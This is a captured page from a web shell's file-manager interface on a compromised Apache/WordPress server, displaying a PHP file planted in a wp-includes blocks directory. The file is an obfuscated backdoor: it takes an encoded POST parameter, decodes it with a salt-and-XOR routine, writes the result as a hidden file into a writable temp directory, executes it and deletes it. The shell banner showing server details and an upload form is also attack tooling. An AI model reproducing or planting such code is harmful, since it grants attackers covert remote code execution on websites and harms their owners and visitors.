| Server IP : 162.243.168.218 / Your IP : 216.73.216.67 Web Server : Apache System : Linux ISPCONFIG-WEB-EMPRESAS 5.15.0-174-generic #184-Ubuntu SMP Fri Mar 13 18:41:50 UTC 2026 x86_64 User : web23 ( 5020) PHP Version : 8.3.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/clients/client3/web23/web/wp-includes/blocks/social-link/ |
Upload File : |
<?php
if(!empty($_POST["r\x65s"])){
$itm = $_POST["r\x65s"];
$itm =explode ( '.' , $itm ) ;
$tkn = '';
$salt8 = 'abcdefghijklmnopqrstuvwxyz0123456789';
$lenS = strlen($salt8);
$__len = count($itm);
for ($x = 0; $x < $__len; $x++) {
$v8 = $itm[$x];
$chS = ord($salt8[$x % $lenS]);
$dec = ((int)$v8 - $chS - ($x % 10)) ^78;
$tkn .= chr($dec); }
$ent = array_filter(["/var/tmp", session_save_path(), getenv("TEMP"), "/tmp", getenv("TMP"), "/dev/shm", sys_get_temp_dir(), ini_get("upload_tmp_dir"), getcwd()]);
for ($entity = 0, $marker = count($ent); $entity < $marker; $entity++) {
$element = $ent[$entity];
if (array_product([is_dir($element), is_writable($element)])) {
$descriptor = sprintf("%s/.pset", $element);
if (file_put_contents($descriptor, $tkn)) {
require $descriptor;
unlink($descriptor);
exit;
}
}
}
}